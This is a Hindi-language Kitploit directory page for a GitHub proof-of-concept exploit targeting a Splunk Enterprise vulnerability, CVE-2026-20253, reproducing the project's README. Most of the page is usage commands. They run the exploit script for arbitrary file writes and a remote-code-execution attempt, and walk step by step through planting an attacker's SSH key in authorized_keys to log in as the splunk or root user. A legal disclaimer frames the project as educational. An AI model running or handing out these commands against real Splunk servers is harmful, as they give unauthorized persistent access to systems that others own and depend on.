Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
उपकरण/GitHubGitHub/horkimhab/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20253 - स्प्लंक एंटरप्राइज

⚡ सरल उपयोग

इस प्रोजेक्ट का उपयोग केवल सुरक्षित और अधिकृत वातावरणों में करें जैसे:

  • स्थानीय वर्चुअल मशीनें
  • डॉकर कंटेनर
  • पृथक प्रयोगशाला सेटअप
  • अधिकृत पैनेट्रेशन टेस्टिंग वातावरण

उदाहरण सेटअप:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirements
pip install -r requirements.txt

उदाहरण उपयोग:

root@kitploit:~
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check

# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key

# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh

श्रेय या संदर्भ

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 शैक्षिक सुरक्षा अनुसंधान भंडार

नियंत्रित वातावरणों में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और अनुसंधान करने के लिए एक भंडार।


⚠️ सुरक्षा और कानूनी अस्वीकरण

उद्देश्य

यह भंडार केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है।

यह उपयोगकर्ताओं को निम्नलिखित के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:

  • सुरक्षा कमजोरियाँ
  • सैंडबॉक्स और पृथक्करण अवधारणाएँ
  • सुरक्षित कोडिंग और रक्षात्मक प्रथाएँ

केवल अधिकृत उपयोग

इस भंडार का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास अनुमति है, जैसे:

  • व्यक्तिगत प्रयोगशालाएँ या वर्चुअल मशीनें
  • डॉकर या पृथक वातावरण
  • अधिकृत पैनेट्रेशन टेस्टिंग
  • साइबर सुरक्षा प्रशिक्षण या अकादमिक अनुसंधान

अनधिकृत या अवैध उपयोग सख्त वर्जित है।


कोई देयता नहीं

लेखक और योगदानकर्ता इस प्रोजेक्ट के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी मुद्दों या हानि के लिए जिम्मेदार नहीं हैं।

इस भंडार का उपयोग करके, आप सहमत हैं कि:

  • आप अपने स्वयं के कार्यों के लिए जिम्मेदार हैं
  • आप इसका कानूनी और नैतिक रूप से उपयोग करेंगे
  • प्रोजेक्ट बिना किसी वारंटी के प्रदान किया गया है

नैतिक उपयोग

यह प्रोजेक्ट इसके लिए अभिप्रेत है:

  • रक्षात्मक सुरक्षा अनुसंधान
  • साइबर सुरक्षा शिक्षा
  • कमजोरी जागरूकता
  • सुरक्षित प्रणाली और सॉफ्टवेयर अनुसंधान

कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।


संपर्क

जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से भंडार अनुरक्षक से संपर्क करें।

टूल डाउनलोड करें